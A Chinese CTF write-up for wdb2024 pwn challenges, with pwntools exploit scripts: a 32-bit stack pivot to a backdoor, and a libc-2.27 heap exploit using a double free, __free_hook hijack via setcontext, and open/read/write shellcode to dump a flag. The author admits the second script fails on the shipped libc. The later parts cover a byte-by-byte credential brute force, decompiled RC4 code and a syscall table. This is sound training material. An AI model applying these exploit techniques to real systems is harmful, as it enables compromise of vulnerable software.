wdb2024

pwn1

image-20241029091057398

可恶的rust逆向,有种做re题的感觉,看不懂一点

pwn2

image-20241029093746667

32位,只开了nx

只能溢出8个字节,栈迁移,有后门函数

from pwn import *
elf = ELF('./short')
# Match the target binary's arch/OS; 'debug' echoes every byte exchanged,
# which is what the writeup's screenshots of the session rely on.
context(arch = elf.arch,os = elf.os,log_level = 'debug')
p = remote("0192d60e43d27e5e8c956281c5971e23.r1bf.dg01.ciihw.cn",46332)
#p = process('./short')
#p = gdb.debug('./short','b main')
gift = elf.sym['gift']          # the backdoor function the writeup mentions; fixed address since only NX is enabled
bin_sh = 0x0804a038             # constant from the binary; presumably the "/bin/sh" string — confirm in the ELF
leave = 0x08048555              # gadget address from the binary; presumably `leave; ret` — confirm
p.sendlineafter('username:','admin')
p.sendlineafter('password','admin123')

# After login the service prints an address as 0x<8 hex digits>; keep it
# as the pivot destination used below.
p.recvuntil('0x')
buf = p.recv(8)
buf = int(buf,16)
print(hex(buf))

# Distance from the start of the buffer to the saved ebp, less the four
# dwords already placed at the front of the buffer.
offset = 0x50 - 0x4*4
# Fake frame laid out at the start of buf: padding, gift() as the address
# popped by `ret`, a dummy return address for gift, and its single argument.
payload = b'aaaa'+ p32(gift)+ p32(0)+p32(bin_sh)
# The 8 overflow bytes the writeup mentions: saved ebp <- buf, return
# address <- leave gadget, so the stack is moved into buf (栈迁移).
p.send(payload + cyclic(offset)+p32(buf)+p32(leave))
p.interactive()

pwn3

pwn3没看懂,而且忘记把题目描述搞下来了,估计是个webpwn的题目吧

pwn4

image-20241029112612117

libc2.27菜单题,应该是堆

image-20241029112700048

有沙箱

在add函数中,限制了堆的数量为7个,size不作限制,正常的存储堆大小和堆指针

edit函数中,首先要确保chunksize不为空,才能进行edit操作

show函数中,需要根据chunksize进行输出

delete函数中,根据index进行free,存在uaf漏洞,free之后会将chunksize置空,也就是说执行delete之后的chunk无法再进行show或者edit了。但是delete之后的chunk仍然可以进行delete,存在double free漏洞。

由于本题存在沙箱,可以尝试free_hook改set_context打orw
解题思路:
根据一般堆题的思路,还是得泄露libc,此处可以通过unsortedbin来进行leak_libc
然后由于set_context需要一个构造好的chunk,还需要获得heap_base
然后使用double free的tcachebin修改free_hook为set_context,再进行delete操作触发set_context,执行布置好的rop链,即可成功orw
解题步骤:
1、add一个unsortedbin chunk0,然后free掉它,由于执行delete操作之后的chunk不能执行show操作,此处可以通过add操作再将chunk分配回来,由于一次unsortedbin会返回两个相同的main_arena地址,所以我们取第二个就好了。
2、add一个tcachebin chunk1,然后直接free掉它两次,再add一个idx不同但是size相同的tcachebin chunk2,然后再次free掉它,然后再free掉chunk1,由于先进后出的机制,所以再次add时chunk1会被分配出来,show chunk1,就会显示chunk1的地址。edit chunk1使chunk1指向free_hook,将free_hook分配出来,修改指向set_context即可。
3、布置rop链,执行orw

(ps:出现了非常重大的纰漏,就是这道题的libc对tcachebin的key进行了检查,但是这道题的chunk在delete之后是无法edit的,也就无法修改key来绕过tcachebin对double free的检测,所以不知道怎么做了,但是在没有对key进行检测的版本还是可以用的,但是在有key的版本可以通过key来泄露堆地址)
from pwn import *
elf = ELF('./pwn')
# The tmux terminal is only used when gdb.attach() is called from a helper.
context(arch = elf.arch,os = elf.os,log_level = 'debug',terminal = ['tmux','splitw','-h'])
p = process('./pwn')
#p = gdb.debug('../pwn','b main')
libc = ELF('./libc-2.27.so')   # the libc version the writeup says the challenge ships

def debug():
    """Attach gdb to the live target process and block until resumed."""
    gdb.attach(p)
    pause()
def menu(index):
    """Choose a menu entry by sending its number after the `option >>` prompt."""
    choice = str(index)
    p.sendlineafter("option >>", choice)
def add(index, size, content):
    """Menu 1: allocate a chunk of `size` bytes in slot `index` holding `content`."""
    menu(1)
    for prompt, value in (("index >>", index), ("size >>", size)):
        p.sendlineafter(prompt, str(value))
    p.sendafter("content >>", content)
def edit(index, content):
    """Menu 2: overwrite the data of slot `index` with `content`."""
    menu(2)
    slot = str(index)
    p.sendlineafter("index >>", slot)
    p.sendafter("content >>", content)
def delete(index):
    """Menu 3: free the chunk in slot `index` (the writeup notes the slot stays reusable)."""
    menu(3)
    slot = str(index)
    p.sendlineafter("index >>", slot)
def show(index):
    """Menu 4: ask the program to print the contents of slot `index`."""
    menu(4)
    slot = str(index)
    p.sendlineafter("index >>", slot)
def exit():
    """Menu 5: leave the program. Note this shadows the builtin `exit` in this script."""
    menu(5)

# Slot 0 is larger than the tcache range and serves as the unsortedbin leak
# chunk; slots 1 and 2 are same-size tcache chunks for the double free; the
# 'barrier' chunk is the author's — presumably keeps the freed chunks away
# from the top chunk, confirm against the heap layout.
add(0,0x410,'aaaa')
add(1,0x150,'bbbb')
add(2,0x150,'cccc')
add(6,0x20,'barrier')

# leak_libc unsortedbin -> chunk0
delete(0)
# A deleted slot cannot be shown (delete() clears its size), so take the
# chunk back; the single NUL only clobbers the low byte of fd and leaves
# the bk pointer at offset 8 intact.
add(0,0x410,b'\x00')
show(0)
recv = p.recv(16)
print(recv)
# Second qword of the output: the unsortedbin bk pointer into main_arena.
unsortedbin = int.from_bytes(recv[8:],byteorder='little')
# 0x70 is the distance from __malloc_hook to that main_arena slot in the
# shipped libc-2.27 — verify against that libc if the base looks wrong.
libc_base = unsortedbin - 0x70 - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
setcontext = libc_base + libc.sym['setcontext']
log.success(hex(unsortedbin))
log.success(hex(libc_base))
log.success(hex(free_hook))
log.success(hex(setcontext))
# double free
# tcachebin -> chunk1
delete(1)
# tcachebin -> chunk2 -> chunk1
delete(2)
# tcachebin -> chunk1 -> chunk2 -> chunk1
# (the author's postscript says the shipped libc checks the tcache key, so
# this second free of chunk1 is detected there and the script stops here)
delete(1)
# tcachebin -> chunk2 -> chunk1 -> free_hook
add(1,0x150,p64(free_hook))
# tcachebin -> chunk1 -> free_hook
add(2,0x150,'cccc')
# tcachebin -> free_hook
add(3,0x150,'eeee')
# chunk4 -> set_context
add(4,0x150,p64(setcontext))

# First `syscall; ret` gadget in libc; used as the rip of the frame below.
syscall = libc_base + next(libc.search(asm("syscall\nret")))
print(hex(syscall))
# Register file that setcontext() loads once free() has been redirected to
# it. The offsets noted per line are the author's and differ from the copy
# of this snippet later on the page; treat these ones as unverified.
frame = SigreturnFrame()
frame.rax = 0 # syscall number: read (author's note: 0x98)
frame.rdi = 0 # arg 1: fd 0, stdin (author's note: 0x70)
frame.rsi = free_hook&0xfffffffffffff000 # arg 2: start of the page holding __free_hook (author's note: 0x78)
frame.rdx = 0x2000 # arg 3: byte count (author's note: 0x90)
frame.rsp = free_hook&0xfffffffffffff000 # stack once the read returns (author's note: 0xa8)
frame.rip = syscall # `syscall; ret` gadget performs the read (author's note: 0xb0)
str_frame = bytes(frame)
print(str_frame)

# Place the frame in a fresh chunk and free it: free() -> __free_hook ->
# setcontext(rdi = chunk 5's user pointer), which loads the frame above.
add(5,0x450,'ffff')
edit(5,str_frame)
delete(5)

# Data the read() above receives, landing at the page base (= new rsp):
# per the writeup, mprotect(page, 0x2000, 7) through syscall 10 (see the
# syscall table at the end of the page; 7 presumably PROT_READ|WRITE|EXEC),
# then a jump to rsp where the shellcode is expected to follow.
layout = [
    next(libc_base+libc.search(asm("pop rdi\nret"))),
    free_hook & 0xfffffffffffff000,
    next(libc_base+libc.search(asm("pop rsi\nret"))),
    0x2000,
    next(libc_base+libc.search(asm("pop rdx\nret"))),
    7,
    next(libc_base+libc.search(asm("pop rax\nret"))),
    10,
    syscall,
    next(libc_base+libc.search(asm("jmp rsp"))),
]
# orw-shellcode: open("flag") / read it onto the stack / write(1, ...) then
# exit_group(0); 0x67616c66 is "flag" and 0x6c696166 is "fail" as LE dwords,
# syscall numbers 2/0/1/231 per the table at the end of the page.
shellcode = asm('''
sub rsp, 0x800
push 0x67616c66
mov rdi, rsp
xor esi, esi
mov eax, 2
syscall

cmp eax, 0
js failed

mov edi, eax
mov rsi, rsp
mov edx, 0x100
xor eax, eax
syscall

mov edx, eax
mov rsi, rsp
mov edi, 1
mov eax, edi
syscall

jmp exit

failed:
push 0x6c696166
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, edi
syscall

exit:
xor edi, edi
mov eax, 231
syscall
''')

payload = flat(layout) + payload
p.sendline(payload)
#delete(7)

p.interactive()

# Second copy of the frame construction; the bracketed offsets are where
# setcontext() reads each register relative to rdi (presumably the ucontext
# register slots), and the register walkthrough that follows is derived
# from them. `free_hook` and `syscall` come from the script above.
frame = SigreturnFrame()
frame.rax = 0 # syscall number: read [rdi+0x90]
frame.rdi = 0 # arg 1: fd 0, stdin [rdi+0x68]
frame.rsi = free_hook&0xfffffffffffff000 # arg 2: start of the page holding __free_hook [rdi+0x70]
frame.rdx = 0x2000 # arg 3: byte count [rdi+0x88]
frame.rsp = free_hook&0xfffffffffffff000 # stack once the read returns [rdi+0xa0]
frame.rip = syscall # `syscall; ret` gadget performs the read [rdi+0xa8]
str_frame = bytes(frame)

分析一下进入setcontext+53之后的程序变化
rsp=free_hook&0xfffffffffffff000
rbx,rbp,r12,r13,r14,r15=0
rcx=syscall;ret
rsp = rcx(push rcx)
rsi=free_hook&0xfffffffffffff000
rdx=0x2000
rcx,r8,r9=0
rdi=0
rax=0(xor eax)
ret syscall(ret)

syscall(rax=0,rdi=0,rsi=free_hook&0xfffffffffffff000,rdx=0x2000)(就是一个read函数)

之后再执行mprotect函数和orw的shellcode

image-20241111224521494

pwn4(赛后版)

保护全开,有沙箱

image-20241110152331842

pwn4在比赛的时候和比赛后似乎不是一个附件,在赛后版添加了一个账号和密码的输入,但是由于cmp函数中存在漏洞,可以通过逐字节爆破的方式来爆破出正确的账号密码。

image-20241110151258807

a1是输入的内容,a2是正确的账号或者密码,实际上应该比较的长度是a2的长度,但是此处使用了a1的长度来比较,存在逻辑漏洞。也就是说如果在输入的密码中只要部分正确就可以通过检验,然后根据后续的长度检验就可以爆破出正确的密码。

账号密码输入正确之后就可以进入菜单部分,也就是堆的部分。

// Decompiled RC4 key-scheduling algorithm (KSA). a1: the 256-byte state
// array S being initialised; a2: the key bytes; a3: the key length (a3 == 0
// would fault on the modulo below). Returns the stack-canary check value
// (zero when the canary is intact).
// NOTE(review): v8 is plain `char`; if char is signed on the target (it is
// on x86-64 Linux) a key byte >= 0x80 contributes a negative term and v7 can
// go negative, indexing below S — a deviation from textbook RC4 to keep in
// mind when re-implementing the cipher locally as the writeup suggests.

unsigned __int64 __fastcall sub_F98(__int64 a1, __int64 a2, unsigned __int64 a3)
{
    char v4; // [rsp+27h] [rbp-119h]            swap temporary
    int i; // [rsp+28h] [rbp-118h]
    int j; // [rsp+28h] [rbp-118h]
    int v7; // [rsp+2Ch] [rbp-114h]             the KSA's running index j
    char v8[264]; // [rsp+30h] [rbp-110h] BYREF  key repeated to 256 bytes (T)
    unsigned __int64 v9; // [rsp+138h] [rbp-8h] stack canary

    v9 = __readfsqword(0x28u);
    v7 = 0;
    memset(v8, 0, 0x100uLL);
    // S[i] = i; T[i] = key[i % keylen]
    for ( i = 0; i <= 255; ++i )
    {
        *(_BYTE *)(i + a1) = i;
        v8[i] = *(_BYTE *)(i % a3 + a2);
    }
    // j = (j + S[i] + T[i]) % 256; swap S[i] and S[j]
    for ( j = 0; j <= 255; ++j )
    {
        v7 = (v8[j] + v7 + *(unsigned __int8 *)(j + a1)) % 256;
        v4 = *(_BYTE *)(j + a1);
        *(_BYTE *)(j + a1) = *(_BYTE *)(v7 + a1);
        *(_BYTE *)(a1 + v7) = v4;
    }
    return __readfsqword(0x28u) ^ v9;
}
// Decompiled RC4 pseudo-random generation (PRGA). a1: the 256-byte state S
// produced by the KSA (mutated in place); a2: the buffer XOR-ed in place
// with the keystream; a3: its length. Returns a3. Per the writeup, running
// this twice restores the data, which assumes the caller starts from the
// same S each time — not visible here, confirm in the callers.

unsigned __int64 __fastcall enc_rc4_1152(__int64 a1, __int64 a2, unsigned __int64 a3)
{
    unsigned __int64 result; // rax
    char v4; // [rsp+23h] [rbp-15h]          swap temporary
    int v5; // [rsp+24h] [rbp-14h]           RC4 index i
    int v6; // [rsp+28h] [rbp-10h]           RC4 index j
    unsigned __int64 i; // [rsp+30h] [rbp-8h]  byte position in the buffer

    v5 = 0;
    v6 = 0;
    for ( i = 0LL; ; ++i )
    {
        result = i;
        if ( i >= a3 )
            break;
        v5 = (v5 + 1) % 256;
        v6 = (v6 + *(unsigned __int8 *)(v5 + a1)) % 256;
        // swap S[i] and S[j]
        v4 = *(_BYTE *)(v5 + a1);
        *(_BYTE *)(v5 + a1) = *(_BYTE *)(v6 + a1);
        *(_BYTE *)(a1 + v6) = v4;
        // buf[k] ^= S[(S[i] + S[j]) & 0xff]
        *(_BYTE *)(a2 + i) ^= *(_BYTE *)((unsigned __int8)(*(_BYTE *)(v5 + a1) + *(_BYTE *)(v6 + a1)) + a1);
    }
    return result;
}

在save函数中将输入的数据进行rc4加密并存储在了堆中

在read函数中将堆块中的数据通过rc4加密之后输出,由于rc4两次之后能够将数据还原,此处其实是将堆块中的数据还原成了未加密的状态输出出来,然后再次进行rc4,将数据再次加密。

在delete函数中将堆块free但是存在uaf漏洞,delete时会使用一次rc4加密

在edit函数中先将原有的数据进行一次rc4加密然后输入新的经过rc4加密的数据,函数不存在漏洞,修改的数据长度是根据read函数中输入的数据来决定的。

已知信息:libc2.27,存在沙箱,存在uaf漏洞
一般情况下是使用set_context + orw,所以试一试吧
解题思路:覆盖free_hook为set_context+53打orw,通过delete函数触发
解题思路->解题步骤
1、如何覆盖free_hook呢,首先要leak_libc
2、实现leak_libc之后,通过修改tcachebin的next就可以修改tcache的指向,从而修改free_hook了
解题步骤
1、先申请9个相同大小的chunk,大小为0x100
2、free掉7个填满tcachebin,再free掉一个填入unsortedbin
3、show tcachebin中的chunk,计算出heap_base
4、show unsortedbin中的chunk,计算出libc_base
5、申请一个跟之前不同大小的chunk,通过uaf实现double free,然后修改tcachebin的指向,修改指向free_hook,然后修改free_hook为set_context+53
6、通过ropper搜索pop rdi;ret pop rsi;ret pop rdx;ret的地址(可以使用系统调用或者函数调用)
7、将构造好的rop写入足够大的堆块中,然后free掉这个chunk,就可以实现rop链的调用。
8、至于数值的解密和加密,可以通过在本地部署一个rc4加密来解决,注意0x0d的截断

系统调用号表

cat /usr/include/asm/unistd_64.h 
/* x86-64 Linux syscall numbers, the author's copy of unistd_64.h, kept as
 * the lookup table for the rax values used in the frames and shellcode
 * above: read 0, write 1, open 2, mprotect 10, exit_group 231. */
#ifndef _ASM_X86_UNISTD_64_H
#define _ASM_X86_UNISTD_64_H 1

#define __NR_read 0
#define __NR_write 1
#define __NR_open 2
#define __NR_close 3
#define __NR_stat 4
#define __NR_fstat 5
#define __NR_lstat 6
#define __NR_poll 7
#define __NR_lseek 8
#define __NR_mmap 9
#define __NR_mprotect 10
#define __NR_munmap 11
#define __NR_brk 12
#define __NR_rt_sigaction 13
#define __NR_rt_sigprocmask 14
#define __NR_rt_sigreturn 15
#define __NR_ioctl 16
#define __NR_pread64 17
#define __NR_pwrite64 18
#define __NR_readv 19
#define __NR_writev 20
#define __NR_access 21
#define __NR_pipe 22
#define __NR_select 23
#define __NR_sched_yield 24
#define __NR_mremap 25
#define __NR_msync 26
#define __NR_mincore 27
#define __NR_madvise 28
#define __NR_shmget 29
#define __NR_shmat 30
#define __NR_shmctl 31
#define __NR_dup 32
#define __NR_dup2 33
#define __NR_pause 34
#define __NR_nanosleep 35
#define __NR_getitimer 36
#define __NR_alarm 37
#define __NR_setitimer 38
#define __NR_getpid 39
#define __NR_sendfile 40
#define __NR_socket 41
#define __NR_connect 42
#define __NR_accept 43
#define __NR_sendto 44
#define __NR_recvfrom 45
#define __NR_sendmsg 46
#define __NR_recvmsg 47
#define __NR_shutdown 48
#define __NR_bind 49
#define __NR_listen 50
#define __NR_getsockname 51
#define __NR_getpeername 52
#define __NR_socketpair 53
#define __NR_setsockopt 54
#define __NR_getsockopt 55
#define __NR_clone 56
#define __NR_fork 57
#define __NR_vfork 58
#define __NR_execve 59
#define __NR_exit 60
#define __NR_wait4 61
#define __NR_kill 62
#define __NR_uname 63
#define __NR_semget 64
#define __NR_semop 65
#define __NR_semctl 66
#define __NR_shmdt 67
#define __NR_msgget 68
#define __NR_msgsnd 69
#define __NR_msgrcv 70
#define __NR_msgctl 71
#define __NR_fcntl 72
#define __NR_flock 73
#define __NR_fsync 74
#define __NR_fdatasync 75
#define __NR_truncate 76
#define __NR_ftruncate 77
#define __NR_getdents 78
#define __NR_getcwd 79
#define __NR_chdir 80
#define __NR_fchdir 81
#define __NR_rename 82
#define __NR_mkdir 83
#define __NR_rmdir 84
#define __NR_creat 85
#define __NR_link 86
#define __NR_unlink 87
#define __NR_symlink 88
#define __NR_readlink 89
#define __NR_chmod 90
#define __NR_fchmod 91
#define __NR_chown 92
#define __NR_fchown 93
#define __NR_lchown 94
#define __NR_umask 95
#define __NR_gettimeofday 96
#define __NR_getrlimit 97
#define __NR_getrusage 98
#define __NR_sysinfo 99
#define __NR_times 100
#define __NR_ptrace 101
#define __NR_getuid 102
#define __NR_syslog 103
#define __NR_getgid 104
#define __NR_setuid 105
#define __NR_setgid 106
#define __NR_geteuid 107
#define __NR_getegid 108
#define __NR_setpgid 109
#define __NR_getppid 110
#define __NR_getpgrp 111
#define __NR_setsid 112
#define __NR_setreuid 113
#define __NR_setregid 114
#define __NR_getgroups 115
#define __NR_setgroups 116
#define __NR_setresuid 117
#define __NR_getresuid 118
#define __NR_setresgid 119
#define __NR_getresgid 120
#define __NR_getpgid 121
#define __NR_setfsuid 122
#define __NR_setfsgid 123
#define __NR_getsid 124
#define __NR_capget 125
#define __NR_capset 126
#define __NR_rt_sigpending 127
#define __NR_rt_sigtimedwait 128
#define __NR_rt_sigqueueinfo 129
#define __NR_rt_sigsuspend 130
#define __NR_sigaltstack 131
#define __NR_utime 132
#define __NR_mknod 133
#define __NR_uselib 134
#define __NR_personality 135
#define __NR_ustat 136
#define __NR_statfs 137
#define __NR_fstatfs 138
#define __NR_sysfs 139
#define __NR_getpriority 140
#define __NR_setpriority 141
#define __NR_sched_setparam 142
#define __NR_sched_getparam 143
#define __NR_sched_setscheduler 144
#define __NR_sched_getscheduler 145
#define __NR_sched_get_priority_max 146
#define __NR_sched_get_priority_min 147
#define __NR_sched_rr_get_interval 148
#define __NR_mlock 149
#define __NR_munlock 150
#define __NR_mlockall 151
#define __NR_munlockall 152
#define __NR_vhangup 153
#define __NR_modify_ldt 154
#define __NR_pivot_root 155
#define __NR__sysctl 156
#define __NR_prctl 157
#define __NR_arch_prctl 158
#define __NR_adjtimex 159
#define __NR_setrlimit 160
#define __NR_chroot 161
#define __NR_sync 162
#define __NR_acct 163
#define __NR_settimeofday 164
#define __NR_mount 165
#define __NR_umount2 166
#define __NR_swapon 167
#define __NR_swapoff 168
#define __NR_reboot 169
#define __NR_sethostname 170
#define __NR_setdomainname 171
#define __NR_iopl 172
#define __NR_ioperm 173
#define __NR_create_module 174
#define __NR_init_module 175
#define __NR_delete_module 176
#define __NR_get_kernel_syms 177
#define __NR_query_module 178
#define __NR_quotactl 179
#define __NR_nfsservctl 180
#define __NR_getpmsg 181
#define __NR_putpmsg 182
#define __NR_afs_syscall 183
#define __NR_tuxcall 184
#define __NR_security 185
#define __NR_gettid 186
#define __NR_readahead 187
#define __NR_setxattr 188
#define __NR_lsetxattr 189
#define __NR_fsetxattr 190
#define __NR_getxattr 191
#define __NR_lgetxattr 192
#define __NR_fgetxattr 193
#define __NR_listxattr 194
#define __NR_llistxattr 195
#define __NR_flistxattr 196
#define __NR_removexattr 197
#define __NR_lremovexattr 198
#define __NR_fremovexattr 199
#define __NR_tkill 200
#define __NR_time 201
#define __NR_futex 202
#define __NR_sched_setaffinity 203
#define __NR_sched_getaffinity 204
#define __NR_set_thread_area 205
#define __NR_io_setup 206
#define __NR_io_destroy 207
#define __NR_io_getevents 208
#define __NR_io_submit 209
#define __NR_io_cancel 210
#define __NR_get_thread_area 211
#define __NR_lookup_dcookie 212
#define __NR_epoll_create 213
#define __NR_epoll_ctl_old 214
#define __NR_epoll_wait_old 215
#define __NR_remap_file_pages 216
#define __NR_getdents64 217
#define __NR_set_tid_address 218
#define __NR_restart_syscall 219
#define __NR_semtimedop 220
#define __NR_fadvise64 221
#define __NR_timer_create 222
#define __NR_timer_settime 223
#define __NR_timer_gettime 224
#define __NR_timer_getoverrun 225
#define __NR_timer_delete 226
#define __NR_clock_settime 227
#define __NR_clock_gettime 228
#define __NR_clock_getres 229
#define __NR_clock_nanosleep 230
#define __NR_exit_group 231
#define __NR_epoll_wait 232
#define __NR_epoll_ctl 233
#define __NR_tgkill 234
#define __NR_utimes 235
#define __NR_vserver 236
#define __NR_mbind 237
#define __NR_set_mempolicy 238
#define __NR_get_mempolicy 239
#define __NR_mq_open 240
#define __NR_mq_unlink 241
#define __NR_mq_timedsend 242
#define __NR_mq_timedreceive 243
#define __NR_mq_notify 244
#define __NR_mq_getsetattr 245
#define __NR_kexec_load 246
#define __NR_waitid 247
#define __NR_add_key 248
#define __NR_request_key 249
#define __NR_keyctl 250
#define __NR_ioprio_set 251
#define __NR_ioprio_get 252
#define __NR_inotify_init 253
#define __NR_inotify_add_watch 254
#define __NR_inotify_rm_watch 255
#define __NR_migrate_pages 256
#define __NR_openat 257
#define __NR_mkdirat 258
#define __NR_mknodat 259
#define __NR_fchownat 260
#define __NR_futimesat 261
#define __NR_newfstatat 262
#define __NR_unlinkat 263
#define __NR_renameat 264
#define __NR_linkat 265
#define __NR_symlinkat 266
#define __NR_readlinkat 267
#define __NR_fchmodat 268
#define __NR_faccessat 269
#define __NR_pselect6 270
#define __NR_ppoll 271
#define __NR_unshare 272
#define __NR_set_robust_list 273
#define __NR_get_robust_list 274
#define __NR_splice 275
#define __NR_tee 276
#define __NR_sync_file_range 277
#define __NR_vmsplice 278
#define __NR_move_pages 279
#define __NR_utimensat 280
#define __NR_epoll_pwait 281
#define __NR_signalfd 282
#define __NR_timerfd_create 283
#define __NR_eventfd 284
#define __NR_fallocate 285
#define __NR_timerfd_settime 286
#define __NR_timerfd_gettime 287
#define __NR_accept4 288
#define __NR_signalfd4 289
#define __NR_eventfd2 290
#define __NR_epoll_create1 291
#define __NR_dup3 292
#define __NR_pipe2 293
#define __NR_inotify_init1 294
#define __NR_preadv 295
#define __NR_pwritev 296
#define __NR_rt_tgsigqueueinfo 297
#define __NR_perf_event_open 298
#define __NR_recvmmsg 299
#define __NR_fanotify_init 300
#define __NR_fanotify_mark 301
#define __NR_prlimit64 302
#define __NR_name_to_handle_at 303
#define __NR_open_by_handle_at 304
#define __NR_clock_adjtime 305
#define __NR_syncfs 306
#define __NR_sendmmsg 307
#define __NR_setns 308
#define __NR_getcpu 309
#define __NR_process_vm_readv 310
#define __NR_process_vm_writev 311
#define __NR_kcmp 312
#define __NR_finit_module 313
#define __NR_sched_setattr 314
#define __NR_sched_getattr 315
#define __NR_renameat2 316
#define __NR_seccomp 317
#define __NR_getrandom 318
#define __NR_memfd_create 319
#define __NR_kexec_file_load 320
#define __NR_bpf 321
#define __NR_execveat 322
#define __NR_userfaultfd 323
#define __NR_membarrier 324
#define __NR_mlock2 325
#define __NR_copy_file_range 326
#define __NR_preadv2 327
#define __NR_pwritev2 328
#define __NR_pkey_mprotect 329
#define __NR_pkey_alloc 330
#define __NR_pkey_free 331
#define __NR_statx 332

#endif /* _ASM_X86_UNISTD_64_H */

参考链接:

PWN-ORW总结 - X1ng’s Blog

https://xz.aliyun.com/t/16081?time__1311=GuD%3DYKBKAKDK7KDs6AS1DRCD9DRg%3DnjhaoD

https://kagehutatsu.com/?p=1143

https://blog.wingszeng.top/pwn-glibc-setcontext/

【八芒星计划】 ORW-CSDN博客

堆上的orw-CSDN博客